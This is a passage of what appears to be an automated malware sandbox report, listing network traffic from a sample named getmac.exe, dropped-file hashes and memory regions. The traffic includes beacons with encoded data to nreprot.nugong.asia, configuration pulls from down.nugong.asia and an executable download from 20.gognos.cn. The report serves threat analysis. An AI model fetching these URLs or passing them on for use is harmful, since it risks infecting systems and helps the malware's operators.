      Set-Cookie: BAIDUID=FCABFA31CB21E04302DDF4B2CB49FE15:FG=1; expires=Thu, 03-Oct-24 10:50:58 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
      Tracecode: 30586970930361527306100418
      Tracecode: 30586976640601061130100418
      X-Powered-By: HHVM
    • flag-cn
      GET
      https://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380565f72b31b6da2d37a0e0cd6204d09cf1ee54b117d611a003310f2977fc79fd9309d2d06dae500f0434bd456fd6b57d28ebb58d725163399e3f0a5c91f7cb3a15cd2c94b30103072cbd0f3216b1c893d5ea3a7a84f4c8513a0e8a31f938f7268508f81b935f3c3db601c3eb4793425b938c3fc5eefc1bccaa65ad3972c4f2919e780977cd50c5e124529063a8b635655612c3ebdcd3eba94bb8113efc8a0a23bca3e376310d35940cb9350b243a851a11f2046b0a4761019cc28c2124a08d459a9cccf008dc1dc737662114211868ba9b29d54bdd2ef05b6
      eda5f540
      Remote address:
      116.163.24.195:443
      Request
      GET /report.php?type=client&data=c7f89dc64da77380565f72b31b6da2d37a0e0cd6204d09cf1ee54b117d611a003310f2977fc79fd9309d2d06dae500f0434bd456fd6b57d28ebb58d725163399e3f0a5c91f7cb3a15cd2c94b30103072cbd0f3216b1c893d5ea3a7a84f4c8513a0e8a31f938f7268508f81b935f3c3db601c3eb4793425b938c3fc5eefc1bccaa65ad3972c4f2919e780977cd50c5e124529063a8b635655612c3ebdcd3eba94bb8113efc8a0a23bca3e376310d35940cb9350b243a851a11f2046b0a4761019cc28c2124a08d459a9cccf008dc1dc737662114211868ba9b29d54bdd2ef05b6 HTTP/1.1
      Accept-Encoding: gzip, deflate
      Host: nreprot.nugong.asia
      Connection: Close
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.17.6.1 Unicorn
      Date: Wed, 04 Oct 2023 10:50:59 GMT
      Content-Type: text/html; charset=utf-8
      X-AspNetMvc-Version: 5.2
      X-AspNet-Version: 4.0.30319
      X-Powered-By: ASP.NET
      X-Cache-Lookup: Cache Miss
      Cache-Control: private
      Content-Length: 3
      X-NWS-LOG-UUID: 8063151262030816650
      Connection: close
      X-Cache-Lookup: Cache Miss
    • flag-us
      DNS
      77.88.193.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      77.88.193.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      226.20.18.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      226.20.18.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      226.21.18.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      226.21.18.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      ocsp.trust-provider.cn
      eda5f540
      Remote address:
      8.8.8.8:53
      Request
      ocsp.trust-provider.cn
      IN A
      Response
      ocsp.trust-provider.cn
      IN CNAME
      ocsp.trust-provider.cn.c.vedcdnlb.com
      ocsp.trust-provider.cn.c.vedcdnlb.com
      IN CNAME
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      117.27.246.96
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      119.36.90.164
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      36.143.236.7
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      36.248.38.100
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.13.153.152
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.48.138.18
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.206.23.199
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      112.50.95.96
    • flag-cn
      GET
      http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D
      eda5f540
      Remote address:
      117.27.246.96:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: ocsp.trust-provider.cn
      Response
      HTTP/1.1 200 OK
      Server: volc-dcdn
      Content-Type: application/ocsp-response
      Content-Length: 599
      Connection: keep-alive
      Date: Wed, 04 Oct 2023 10:50:59 GMT
      Age: 1
      CF-Cache-Status: EXPIRED
      CF-RAY: 80f216982cfd9836-SJC
      ETag: "23d9859148cd758aa9eac8e5e5b3fa7b16968b28"
      Expires: Sun, 08 Oct 2023 04:10:25 GMT
      Last-Modified: Sun, 01 Oct 2023 04:10:26 GMT
      WS-Cache-Status: 0
      X-CCACDN-Proxy-ID: scdpinlb2
      X-Frame-Options: SAMEORIGIN
      X-Via: 1.1 nxian198:8 (Cdn Cache Server V2.0), 1.1 PS-JJN-01XpV172:3 (Cdn Cache Server V2.0)
      X-Ws-Request-Id: 651d3c67_PS-JJN-01XpV172_34442-64456
      cache-via: cache.n172-013-214.fzmp
      x-request-ip: 154.61.71.13
      x-tt-trace-tag: id=5
      x-dsa-trace-id: 16964166594cbdc009500c9da237cb00a6df5b6771
      X-Bdsa-Cache-Status: HIT
      Cache-Via-Status: cache.n172-013-214.fzmp(HIT)
      X-Bdsa-Cache-Tm: 1696414823-1764
      Accept-Ranges: bytes
      via: n172-013-214.fzmp.ToB
      X-Dsa-Origin-Status: 200
      server-timing: cdn-cache;desc=HIT, origin;dur=0, edge;dur=2
    • flag-us
      DNS
      101.14.18.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      101.14.18.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      101.15.18.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      101.15.18.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      96.246.27.117.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      96.246.27.117.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      2.2.2.234.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      2.2.2.234.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      211.112.123.233.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      211.112.123.233.in-addr.arpa
      IN PTR
      Response
    • flag-cn
      GET
      http://nreprot.nugong.asia/report/report_data?data=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
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /report/report_data?data=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 HTTP/1.1
      Host: nreprot.nugong.asia
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.17.6.1 Unicorn
      Date: Wed, 04 Oct 2023 10:51:08 GMT
      Content-Type: text/html; charset=utf-8
      X-AspNetMvc-Version: 5.2
      X-AspNet-Version: 4.0.30319
      X-Powered-By: ASP.NET
      X-Cache-Lookup: Cache Miss
      X-Cache-Lookup: Hit From Inner Cluster
      Cache-Control: private
      Content-Length: 3
      X-NWS-LOG-UUID: 16610356150237786035
      Connection: keep-alive
      X-Cache-Lookup: Cache Miss
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/psexe.txt
      getmac.exe
      Remote address:
      116.163.24.195:80
      Request
      GET /cfg/cmc/psexe.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 04 Oct 2023 10:27:26 GMT
      Etag: "61dce90040ba158479521e19bcdc6546"
      Content-Type: text/plain
      Date: Wed, 04 Oct 2023 10:30:35 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 7528396351655483740
      x-cos-request-id: NjUxZDNlY2JfODhhMDA4MDlfZWM5Yl8yZmI2NmZl
      Content-Length: 10896
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 6368157307893339986
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-us
      DNS
      157.123.68.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      157.123.68.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      171.39.242.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      171.39.242.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      59.128.231.4.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      59.128.231.4.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      20.gognos.cn
      getmac.exe
      Remote address:
      8.8.8.8:53
      Request
      20.gognos.cn
      IN A
      Response
      20.gognos.cn
      IN A
      222.173.195.26
    • flag-us
      DNS
      20.gognos.cn
      getmac.exe
      Remote address:
      8.8.8.8:53
      Request
      20.gognos.cn
      IN A
      Response
      20.gognos.cn
      IN A
      222.173.195.26
    • flag-cn
      GET
      http://20.gognos.cn:59116/deodej2d0.exe
      getmac.exe
      Remote address:
      222.173.195.26:59116
      Request
      GET /deodej2d0.exe HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: 20.gognos.cn:59116
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Wed, 04 Oct 2023 10:51:12 GMT
      Content-Type: application/octet-stream
      Content-Length: 12138353
      Last-Modified: Tue, 03 Oct 2023 15:56:59 GMT
      Connection: keep-alive
      ETag: "651c39cb-b93771"
      Accept-Ranges: bytes
    • flag-us
      DNS
      126.179.238.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      126.179.238.8.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      26.195.173.222.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      26.195.173.222.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      26.195.173.222.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      26.195.173.222.in-addr.arpa
      IN PTR
      Response
    • 116.163.24.195:443
      https://down.nugong.asia/pgm/mpr/c995ec7fd4f57c0d/0d78fe00f48f2148.zip
      tls, http
      eda5f540
      17.1kB
      486.1kB
      358
      356

      HTTP Request

      GET https://down.nugong.asia/pgm/mpr/c995ec7fd4f57c0d/0d78fe00f48f2148.zip

      HTTP Response

      200
    • 204.79.197.200:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=
      tls, http2
      1.9kB
      9.3kB
      22
      19

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=77f88c83a1bd4b41b49d9e0ffb72e358&localId=w:31F834CF-BC45-37ED-F489-F6738C9E752F&deviceId=6755458044225800&anid=

      HTTP Response

      204
    • 116.163.24.195:80
      http://down.nugong.asia/cfg/cmc/urlmd5.json
      http
      getmac.exe
      40.1kB
      1.1MB
      828
      827

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/ping.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/ping.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/userchange.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/userpq.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/blacklist.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/0d78fe00f48f2148.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/pub/ms.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/pub/ps.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/Lander.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/psexe.txt

      HTTP Response

      200

      HTTP Request

      GET http://mprrpt.nugong.asia/report.php?data=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

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/urlmd5.json

      HTTP Response

      200
    • 101.227.134.49:443
      https://apps.game.qq.com/comm-htdocs/ip/get_ip.php
      tls, http
      getmac.exe
      1.1kB
      4.4kB
      14
      12

      HTTP Request

      GET https://apps.game.qq.com/comm-htdocs/ip/get_ip.php

      HTTP Response

      200
    • 47.246.48.205:80
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D
      http
      getmac.exe
      782 B
      2.2kB
      7
      5

      HTTP Request

      GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D

      HTTP Response

      200

      HTTP Request

      GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D

      HTTP Response

      200
    • 104.193.88.77:443
      https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json
      tls, http
      getmac.exe
      1.4kB
      7.1kB
      19
      16

      HTTP Request

      GET https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json

      HTTP Response

      200
    • 116.163.24.195:443
      https://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380565f72b31b6da2d37a0e0cd6204d09cf1ee54b117d611a003310f2977fc79fd9309d2d06dae500f0434bd456fd6b57d28ebb58d725163399e3f0a5c91f7cb3a15cd2c94b30103072cbd0f3216b1c893d5ea3a7a84f4c8513a0e8a31f938f7268508f81b935f3c3db601c3eb4793425b938c3fc5eefc1bccaa65ad3972c4f2919e780977cd50c5e124529063a8b635655612c3ebdcd3eba94bb8113efc8a0a23bca3e376310d35940cb9350b243a851a11f2046b0a4761019cc28c2124a08d459a9cccf008dc1dc737662114211868ba9b29d54bdd2ef05b6
      tls, http
      eda5f540
      1.6kB
      1.0kB
      13
      12

      HTTP Request

      GET https://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380565f72b31b6da2d37a0e0cd6204d09cf1ee54b117d611a003310f2977fc79fd9309d2d06dae500f0434bd456fd6b57d28ebb58d725163399e3f0a5c91f7cb3a15cd2c94b30103072cbd0f3216b1c893d5ea3a7a84f4c8513a0e8a31f938f7268508f81b935f3c3db601c3eb4793425b938c3fc5eefc1bccaa65ad3972c4f2919e780977cd50c5e124529063a8b635655612c3ebdcd3eba94bb8113efc8a0a23bca3e376310d35940cb9350b243a851a11f2046b0a4761019cc28c2124a08d459a9cccf008dc1dc737662114211868ba9b29d54bdd2ef05b6

      HTTP Response

      200
    • 117.27.246.96:80
      http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D
      http
      eda5f540
      525 B
      1.8kB
      6
      4

      HTTP Request

      GET http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D

      HTTP Response

      200
    • 116.163.24.195:80
      http://down.nugong.asia/cfg/cmc/psexe.txt
      http
      getmac.exe
      2.1kB
      12.5kB
      20
      19

      HTTP Request

      GET http://nreprot.nugong.asia/report/report_data?data=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

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/psexe.txt

      HTTP Response

      200
    • 222.173.195.26:59116
      http://20.gognos.cn:59116/deodej2d0.exe
      http
      getmac.exe
      451.3kB
      12.5MB
      8946
      8930

      HTTP Request

      GET http://20.gognos.cn:59116/deodej2d0.exe

      HTTP Response

      200
    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      66 B
      90 B
      1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    • 8.8.8.8:53
      4.159.190.20.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      4.159.190.20.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      241.154.82.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      241.154.82.20.in-addr.arpa

    • 114.114.114.114:53
      down.nugong.asia
      dns
      eda5f540
      62 B
      392 B
      1
      1

      DNS Request

      down.nugong.asia

      DNS Response

      116.163.24.195
      123.12.213.243
      119.188.86.194
      1.62.64.68
      122.189.171.55
      221.15.67.105
      42.7.60.104
      110.249.196.101
      36.248.54.85
      119.167.229.212
      116.172.148.7
      125.39.165.235
      218.29.205.139
      123.12.213.187
      123.12.235.196

    • 8.8.8.8:53
      114.114.114.114.in-addr.arpa
      dns
      74 B
      106 B
      1
      1

      DNS Request

      114.114.114.114.in-addr.arpa

    • 8.8.8.8:53
      208.194.73.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      208.194.73.20.in-addr.arpa

    • 8.8.8.8:53
      254.20.238.8.in-addr.arpa
      dns
      71 B
      125 B
      1
      1

      DNS Request

      254.20.238.8.in-addr.arpa

    • 8.8.8.8:53
      195.24.163.116.in-addr.arpa
      dns
      73 B
      132 B
      1
      1

      DNS Request

      195.24.163.116.in-addr.arpa

    • 8.8.8.8:53
      41.110.16.96.in-addr.arpa
      dns
      71 B
      135 B
      1
      1

      DNS Request

      41.110.16.96.in-addr.arpa

    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
      158 B
      1
      1

      DNS Request

      g.bing.com

      DNS Response

      204.79.197.200
      13.107.21.200

    • 8.8.8.8:53
      200.197.79.204.in-addr.arpa
      dns
      73 B
      106 B
      1
      1

      DNS Request

      200.197.79.204.in-addr.arpa

    • 8.8.8.8:53
      26.35.223.20.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      26.35.223.20.in-addr.arpa

    • 8.8.8.8:53
      apps.game.qq.com
      dns
      getmac.exe
      62 B
      94 B
      1
      1

      DNS Request

      apps.game.qq.com

      DNS Response

      101.227.134.49
      101.227.134.27

    • 8.8.8.8:53
      ocsp.digicert.cn
      dns
      getmac.exe
      62 B
      122 B
      1
      1

      DNS Request

      ocsp.digicert.cn

      DNS Response

      47.246.48.205

    • 8.8.8.8:53
      49.134.227.101.in-addr.arpa
      dns
      73 B
      132 B
      1
      1

      DNS Request

      49.134.227.101.in-addr.arpa

    • 8.8.8.8:53
      205.48.246.47.in-addr.arpa
      dns
      72 B
      143 B
      1
      1

      DNS Request

      205.48.246.47.in-addr.arpa

    • 8.8.8.8:53
      sp1.baidu.com
      dns
      getmac.exe
      59 B
      144 B
      1
      1

      DNS Request

      sp1.baidu.com

      DNS Response

      104.193.88.77
      104.193.88.123

    • 8.8.8.8:53
      77.88.193.104.in-addr.arpa
      dns
      72 B
      126 B
      1
      1

      DNS Request

      77.88.193.104.in-addr.arpa

    • 8.8.8.8:53
      226.20.18.104.in-addr.arpa
      dns
      72 B
      134 B
      1
      1

      DNS Request

      226.20.18.104.in-addr.arpa

    • 8.8.8.8:53
      226.21.18.104.in-addr.arpa
      dns
      72 B
      134 B
      1
      1

      DNS Request

      226.21.18.104.in-addr.arpa

    • 8.8.8.8:53
      ocsp.trust-provider.cn
      dns
      eda5f540
      68 B
      300 B
      1
      1

      DNS Request

      ocsp.trust-provider.cn

      DNS Response

      117.27.246.96
      119.36.90.164
      36.143.236.7
      36.248.38.100
      111.13.153.152
      111.48.138.18
      111.206.23.199
      112.50.95.96

    • 8.8.8.8:53
      101.14.18.104.in-addr.arpa
      dns
      72 B
      134 B
      1
      1

      DNS Request

      101.14.18.104.in-addr.arpa

    • 8.8.8.8:53
      101.15.18.104.in-addr.arpa
      dns
      72 B
      134 B
      1
      1

      DNS Request

      101.15.18.104.in-addr.arpa

    • 8.8.8.8:53
      96.246.27.117.in-addr.arpa
      dns
      72 B
      125 B
      1
      1

      DNS Request

      96.246.27.117.in-addr.arpa

    • 234.2.2.2:13265
      getmac.exe
      138 B
      3
    • 233.123.112.211:41725
      getmac.exe
      184 B
      2
    • 8.8.8.8:53
      2.2.2.234.in-addr.arpa
      dns
      68 B
      125 B
      1
      1

      DNS Request

      2.2.2.234.in-addr.arpa

    • 8.8.8.8:53
      211.112.123.233.in-addr.arpa
      dns
      74 B
      131 B
      1
      1

      DNS Request

      211.112.123.233.in-addr.arpa

    • 255.255.255.255:1281
      getmac.exe
      60 B
      1
    • 8.8.8.8:53
      157.123.68.40.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      157.123.68.40.in-addr.arpa

    • 8.8.8.8:53
      171.39.242.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      171.39.242.20.in-addr.arpa

    • 8.8.8.8:53
      59.128.231.4.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      59.128.231.4.in-addr.arpa

    • 8.8.8.8:53
      20.gognos.cn
      dns
      getmac.exe
      116 B
      148 B
      2
      2

      DNS Request

      20.gognos.cn

      DNS Request

      20.gognos.cn

      DNS Response

      222.173.195.26

      DNS Response

      222.173.195.26

    • 8.8.8.8:53
      126.179.238.8.in-addr.arpa
      dns
      72 B
      126 B
      1
      1

      DNS Request

      126.179.238.8.in-addr.arpa

    • 8.8.8.8:53
      26.195.173.222.in-addr.arpa
      dns
      146 B
      262 B
      2
      2

      DNS Request

      26.195.173.222.in-addr.arpa

      DNS Request

      26.195.173.222.in-addr.arpa

    • 255.255.255.255:1281
      getmac.exe
      60 B
      1
    • 255.255.255.255:1281
      getmac.exe
      60 B
      1

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Program Files\getmac.exe

      Filesize

      88KB

      MD5

      7d4b72dff5b8e98dd1351a401e402c33

      SHA1

      40810fb6eee8856b1884ecb528c88b97e447c5d8

      SHA256

      467ce33b5145c6e71499f32139f14d81b47c38f11dca26b330367add263dba12

      SHA512

      5a26e5e22ad1005e67f6b66187df4e6f75f1b611b2c8d615af34bd61e94fd48fc64b606e7c43d608d112096c7bbaa8fddfc8a9acb603ab137e71d85783b98fd5

    • C:\Users\Admin\AppData\Local\Temp\834a700f.tmp

      Filesize

      11.6MB

      MD5

      5244c87dbafa1f764b258766005dea73

      SHA1

      84cb8b4fb3e0910cfecfb31b6fa54c16d940e703

      SHA256

      077035f93ddc3ac5a8b5631d43826baf7722256eb1c4716b3c2567f07379bc40

      SHA512

      54d64d32e73e2752cdf9a110db17ad64574eb072df0ed0dc34a7e4bc469c03aa79ef7d45465e279ef85d5fc6b33a1b750b181476cdea7ea98898ddba9aa60438

    • C:\Windows\SysWOW64\eda5f540

      Filesize

      271KB

      MD5

      52f24bd4d3d617057481e5d25f34fbed

      SHA1

      18328882cc8204ab3842f4264983a98963f8b11e

      SHA256

      b1874596a33641cd412dd227c45f9c2b38208ace88af44af95cd8e402cac705c

      SHA512

      033f6b83f0a6446fd35cccffc2430375014ff11e75b8969e3f8a7b0e384b653dba93a1e16bf48907d5e1d840261388c4048b8e64e0fd7ba96fece67c65c096cf

    • memory/608-29-0x0000012A5D220000-0x0000012A5D223000-memory.dmp

      Filesize

      12KB

    • memory/608-71-0x0000012A5D270000-0x0000012A5D271000-memory.dmp

      Filesize

      4KB

    • memory/608-32-0x0000012A5D230000-0x0000012A5D258000-memory.dmp

      Filesize

      160KB

    • memory/608-31-0x0000012A5D270000-0x0000012A5D271000-memory.dmp

      Filesize

      4KB

    • memory/1404-9-0x0000000000EF0000-0x0000000000F79000-memory.dmp

      Filesize

      548KB

    • memory/1404-0-0x0000000000EF0000-0x0000000000F79000-memory.dmp

      Filesize

      548KB

    • memory/1404-39-0x0000000000EF0000-0x0000000000F79000-memory.dmp

      Filesize

      548KB

    • memory/1836-63-0x00007FF9FCB30000-0x00007FF9FCB40000-memory.dmp

      Filesize

      64KB

    • memory/1836-80-0x000001FE413C0000-0x000001FE413C1000-memory.dmp

      Filesize

      4KB

    • memory/1836-85-0x000001FE413A0000-0x000001FE413A2000-memory.dmp

      Filesize

      8KB

    • memory/1836-26-0x00007FF9FCB30000-0x00007FF9FCB40000-memory.dmp

      Filesize

      64KB

    • memory/1836-23-0x000001FE41250000-0x000001FE4131B000-memory.dmp

      Filesize

      812KB

    • memory/1836-22-0x000001FE41250000-0x000001FE4131B000-memory.dmp

      Filesize

      812KB

    • memory/1836-84-0x000001FE423C0000-0x000001FE42585000-memory.dmp

      Filesize

      1.8MB

    • memory/1836-82-0x000001FE413A0000-0x000001FE413A1000-memory.dmp

      Filesize

      4KB

    • memory/1836-81-0x000001FE413B0000-0x000001FE413B1000-memory.dmp

      Filesize

      4KB

    • memory/1836-25-0x000001FE3FA20000-0x000001FE3FA21000-memory.dmp

      Filesize

      4KB

    • memory/1836-65-0x000001FE41250000-0x000001FE4131B000-memory.dmp

      Filesize

      812KB

    • memory/1836-79-0x000001FE413C0000-0x000001FE413C1000-memory.dmp

      Filesize

      4KB

    • memory/1836-70-0x000001FE3FA20000-0x000001FE3FA21000-memory.dmp

      Filesize

      4KB

    • memory/1836-78-0x000001FE413A0000-0x000001FE413A1000-memory.dmp

      Filesize

      4KB

    • memory/1836-72-0x000001FE413A0000-0x000001FE413A1000-memory.dmp

      Filesize

      4KB

    • memory/1836-73-0x000001FE41390000-0x000001FE41391000-memory.dmp

      Filesize

      4KB

    • memory/1836-74-0x000001FE413C0000-0x000001FE413C1000-memory.dmp

      Filesize

      4KB

    • memory/1836-75-0x000001FE413A0000-0x000001FE413A1000-memory.dmp

      Filesize

      4KB

    • memory/1836-76-0x000001FE423C0000-0x000001FE42585000-memory.dmp

      Filesize

      1.8MB

    • memory/1836-77-0x000001FE413A0000-0x000001FE413A2000-memory.dmp

      Filesize

      8KB

    • memory/2256-69-0x0000000000080000-0x0000000000109000-memory.dmp

      Filesize

      548KB

    • memory/2256-64-0x0000000000080000-0x0000000000109000-memory.dmp

      Filesize

      548KB

    • memory/2256-27-0x0000000000080000-0x0000000000109000-memory.dmp

      Filesize

      548KB

    • memory/2256-3-0x0000000000080000-0x0000000000109000-memory.dmp

      Filesize

      548KB

    • memory/3212-13-0x0000000002600000-0x0000000002603000-memory.dmp

      Filesize

      12KB

    • memory/3212-20-0x0000000006C70000-0x0000000006D69000-memory.dmp

      Filesize

      996KB

    • memory/3212-50-0x00000000077B0000-0x00000000077B1000-memory.dmp

      Filesize

      4KB

    • memory/3212-11-0x0000000002600000-0x0000000002603000-memory.dmp

      Filesize

      12KB

    • memory/3212-21-0x00000000077B0000-0x00000000077B1000-memory.dmp

      Filesize

      4KB
